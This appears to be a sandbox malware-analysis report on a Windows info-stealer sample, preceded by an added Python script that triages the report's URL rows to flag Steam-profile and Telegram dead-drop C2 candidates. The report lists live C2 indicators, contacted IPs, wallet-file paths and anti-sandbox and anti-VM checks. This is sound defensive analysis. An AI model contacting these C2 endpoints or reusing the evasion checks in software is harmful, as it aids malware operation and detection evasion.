Source: unknown | HTTPS traffic detected: 65.109.142.154:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49742 version: TLS 1.2
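The URL rows above mix two very different things. Most of them are the asset and Content-Security-Policy hosts of the Steam profile page the sample downloaded (the dropped file 76561199786602107[1].htm) and say nothing about the malware. The rows whose source column is the bare sample name are strings embedded in the binary on disk: the Steam profile URL and the t.me channel. A third group, such as https://lv.queniujq.cn, appears only in memory. The script below is an added example, not part of the Joe Sandbox report, that parses rows in this listing's shape, discards strings seen only in the dropped HTML, allow-lists the hosts the profile page is expected to reference, and flags the Steam profile and Telegram URLs separately. That last classification assumes Vidar's documented habit of reading its real C2 address from a Steam profile or a Telegram channel; the allow-list and the embedded sample rows are constructed from lines on this page and are deliberately incomplete.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed excerpt in the shape of the report rows (source column, then finding).
# Values are copied from the listing on this page; it is not the complete list.
SAMPLE_REPORT = """
Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lv.queniujq.cn
Source: aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://recaptcha.net
Source: aZm1EZ2IYr.exe | String found in binary or memory: https://steamcommunity.com/profiles/76561199786602107
Source: aZm1EZ2IYr.exe | String found in binary or memory: https://t.me/lpnjoke
Source: aZm1EZ2IYr.exe | String found in binary or memory: https://t.me/lpnjokeg0b4cMozilla/5.0
Source: 76561199786602107[1].htm.0.dr | String found in binary or memory: https://store.steampowered.com/about/
Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=bOP7RorZq4_W&l=englis
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 65.109.142.154:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49742 version: TLS 1.2
"""

# Hosts that a fetched Steam profile page is expected to reference (assets, CSP sources).
# Assembled from this page; extend it per report.
EXPECTED_HOSTS = (
    "steamcommunity.com", "steampowered.com", "steamstatic.com", "valvesoftware.com",
    "steam.tv", "akamaized.net", "google.com", "gstatic.com", "gstatic.cn",
    "recaptcha.net", "youtube.com", "ytimg.com", "vimeo.com", "medal.tv", "sketchfab.com",
)

# Assumption (not stated by the report): Vidar resolves its C2 through a Steam profile
# page or a Telegram channel, so URLs of these shapes are dead-drop candidates.
DEAD_DROP_PATTERNS = (
    re.compile(r"^https?://steamcommunity\.com/profiles/\d+"),
    re.compile(r"^https?://t\.me/[A-Za-z0-9_]+"),
)

# Tolerates both the separated form above and the collapsed "...sdmpString found" form.
STRING_RE = re.compile(r"^Source:\s*(?P<src>.*?)\s*\|?\s*String found in binary or memory:\s*(?P<url>\S+)")
TLS_RE = re.compile(r"HTTPS traffic detected:\s*(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)\s*->")


def clean_url(url):
    """In memory the URL is immediately followed by the User-Agent string (no separator), e.g.
    '.../lpnjokeg0b4cMozilla/5.0' on this page; cut that run-on off."""
    i = url.find("Mozilla/")
    return url[:i] if i > 0 else url


def is_expected(host):
    return any(host == h or host.endswith("." + h) for h in EXPECTED_HOSTS)


def source_kinds(src):
    """Classify a source column: a bare name followed by a .sdmp entry is the process that owns
    the memory region; a bare name on its own is the static file; .dr is a dropped file."""
    kinds, pending = set(), None
    for part in (p.strip() for p in src.split(",")):
        if not part:
            continue
        if part.endswith(".sdmp"):
            kinds.add("memory")
            pending = None
        elif part.endswith(".dr"):
            kinds.add("dropped")
            pending = None
        else:
            if pending:
                kinds.add("static")
            pending = part
    if pending:
        kinds.add("static")
    return kinds


def triage(report_text):
    by_host = defaultdict(set)
    hardcoded, dead_drop, remote_ips = set(), set(), set()
    for line in report_text.splitlines():
        m = STRING_RE.match(line.strip())
        if m:
            url = clean_url(m.group("url"))
            host = urlsplit(url).hostname or ""
            kinds = source_kinds(m.group("src"))
            if kinds == {"dropped"}:
                continue  # present only in the downloaded HTML, never in the sample itself
            by_host[host].add(url)
            if "static" in kinds:
                hardcoded.add(url)  # embedded in the binary on disk
            if any(p.match(url) for p in DEAD_DROP_PATTERNS):
                dead_drop.add(url)
            continue
        m = TLS_RE.search(line)
        if m:
            remote_ips.add(m.group("ip"))
    suspicious = {h: sorted(u) for h, u in by_host.items() if h and not is_expected(h)}
    return {
        "hardcoded": sorted(hardcoded),
        "dead_drop": sorted(dead_drop),
        "suspicious_hosts": suspicious,
        "remote_ips": sorted(remote_ips),
    }


if __name__ == "__main__":
    import json
    import sys
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_REPORT
    print(json.dumps(triage(text), indent=2))
```

Run it with the report text saved to a file to get JSON; with no argument it runs over the embedded excerpt. The remaining g0b4c suffix on the truncated Telegram URL is still glue from the binary's string layout, so match dead-drop identifiers by prefix rather than exact string when turning these into detections. The three TLS endpoints are returned as-is: the report does not state which hostname each one served, so attribute them from the PCAP rather than from this list.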

System Summary

                          Source: aZm1EZ2IYr.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Code function: 0_2_0018145B GetCurrentProcess,NtQueryInformationProcess, | 0_2_0018145B
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Code function: 0_2_0019C4B7 | 0_2_0019C4B7
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Code function: 0_2_001AD983 | 0_2_001AD983
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Code function: 0_2_001AD213 | 0_2_001AD213
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Code function: 0_2_0019954F | 0_2_0019954F
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Code function: 0_2_001ACD7E | 0_2_001ACD7E
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Code function: 0_2_001ADD6B | 0_2_001ADD6B
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Code function: 0_2_001AD5B1 | 0_2_001AD5B1
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Code function: 0_2_0019B757 | 0_2_0019B757
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Code function: String function: 001847E8 appears 38 times
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Code function: String function: 001905DE appears 71 times
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Code function: String function: 001904BC appears 36 times
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7336 -s 2220
                          Source: aZm1EZ2IYr.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/11@3/3
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Code function: 0_2_0019147A CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, | 0_2_0019147A
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Code function: 0_2_0019196C __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z,__EH_prolog3_catch,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear, | 0_2_0019196C
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199786602107[1].htm
                          Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7336
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | File created: C:\Users\user\AppData\Local\Temp\delays.tmp
                          Source: aZm1EZ2IYr.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1002\desktop.ini
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: aZm1EZ2IYr.exe | ReversingLabs: Detection: 73%
                          Source: aZm1EZ2IYr.exe | Virustotal: Detection: 60%
                          Source: unknown | Process created: C:\Users\user\Desktop\aZm1EZ2IYr.exe "C:\Users\user\Desktop\aZm1EZ2IYr.exe"
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7336 -s 2220
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7336 -s 2384
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: apphelp.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: sspicli.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: wininet.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: rstrtmgr.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: ncrypt.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: ntasn1.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: dbghelp.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: iertutil.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: windows.storage.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: wldp.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: profapi.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: kernel.appcore.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: winhttp.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: mswsock.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: iphlpapi.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: winnsi.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: urlmon.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: srvcli.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: netutils.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: dnsapi.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: rasadhlp.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: fwpuclnt.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: schannel.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: mskeyprotect.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: msasn1.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: dpapi.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: cryptsp.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: rsaenh.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: cryptbase.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: gpapi.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: ncryptsslp.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: wbemcomn.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: amsi.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: userenv.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: version.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: uxtheme.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: sxs.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: propsys.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: windows.fileexplorer.common.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: ntmarta.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Section loaded: edputil.dll
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_00198995 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00198995
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Code function: 0_2_001AF192 push ecx; ret | 0_2_001AF1A5
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Code function: 0_2_001A2D89 push esi; ret | 0_2_001A2D8B
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Code function: 0_2_0019DE05 push ecx; ret | 0_2_0019DE18
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_00198995 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00198995
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          Source: Yara match | File source: aZm1EZ2IYr.exe, type: SAMPLE
                          Source: Yara match | File source: 0.2.aZm1EZ2IYr.exe.180000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.0.aZm1EZ2IYr.exe.180000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000000.00000000.1668857258.00000000001B0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara match | File source: Process Memory Space: aZm1EZ2IYr.exe PID: 7336, type: MEMORYSTR
                          Source: c:\users\user\desktop\azm1ez2iyr.exe | Event Logs and Signature results: Application crash and keyboard check
                          Source: aZm1EZ2IYr.exe | Binary or memory string: DIR_WATCH.DLL
                          Source: aZm1EZ2IYr.exe | Binary or memory string: SBIEDLL.DLL
                          Source: aZm1EZ2IYr.exe | Binary or memory string: API_LOG.DLL
                          Source: aZm1EZ2IYr.exeBinary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL23:02:2823:02:2823:02:2823:02:2823:02:2823:02:28DELAYS.TMP%S%SNTDLL.DLL
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos, | 0_2_0018180D
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Code function: 0_2_00190DB0 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00190EC3h | 0_2_00190DB0
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | File Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Code function: 0_2_00196013 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, | 0_2_00196013
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Code function: 0_2_0018B914 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, | 0_2_0018B914
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Code function: 0_2_00195B4D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, | 0_2_00195B4D
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Code function: 0_2_0019547D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, | 0_2_0019547D
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Code function: 0_2_00189CF1 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, | 0_2_00189CF1
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Code function: 0_2_00194D08 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose, | 0_2_00194D08
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Code function: 0_2_0018CD0C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, | 0_2_0018CD0C
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Code function: 0_2_0018D59B FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, | 0_2_0018D59B
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Code function: 0_2_00181D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose, | 0_2_00181D80
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Code function: 0_2_0018B5B4 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, | 0_2_0018B5B4
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Code function: 0_2_0018BF22 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, | 0_2_0018BF22
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Code function: 0_2_00195182 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, | 0_2_00195182
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exe | Code function: 0_2_00190F8F GetSystemInfo,wsprintfA, | 0_2_00190F8F
                          Source: Amcache.hve.6.dr | Binary or memory string: VMware
                          Source: Amcache.hve.6.dr | Binary or memory string: VMware Virtual USB Mouse
                          Source: Amcache.hve.6.dr | Binary or memory string: vmci.syshbin
                          Source: Amcache.hve.6.dr | Binary or memory string: VMware, Inc.
                          Source: Amcache.hve.6.dr | Binary or memory string: VMware20,1hbin@
                          Source: Amcache.hve.6.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                          Source: Amcache.hve.6.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: Amcache.hve.6.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                          Source: aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003A6E000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1948655948.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                          Source: Amcache.hve.6.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: Amcache.hve.6.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                          Source: Amcache.hve.6.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
                          Source: Amcache.hve.6.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: Amcache.hve.6.dr | Binary or memory string: vmci.sys
                          Source: Amcache.hve.6.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                          Source: Amcache.hve.6.dr | Binary or memory string: vmci.syshbin`
                          Source: Amcache.hve.6.dr | Binary or memory string: \driver\vmci,\driver\pci
                          Source: Amcache.hve.6.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: Amcache.hve.6.dr | Binary or memory string: VMware20,1
                          Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                          Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                          Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                          Source: aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003A6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                          Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                          Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                          Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                          Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                          Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                          Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                          Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                          Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeAPI call chain: ExitProcess graph end nodegraph_0-20787
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeAPI call chain: ExitProcess graph end nodegraph_0-20772
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeAPI call chain: ExitProcess graph end nodegraph_0-22113
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeProcess information queried: ProcessInformation
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeProcess queried: DebugPort
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0019D05A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0019D05A
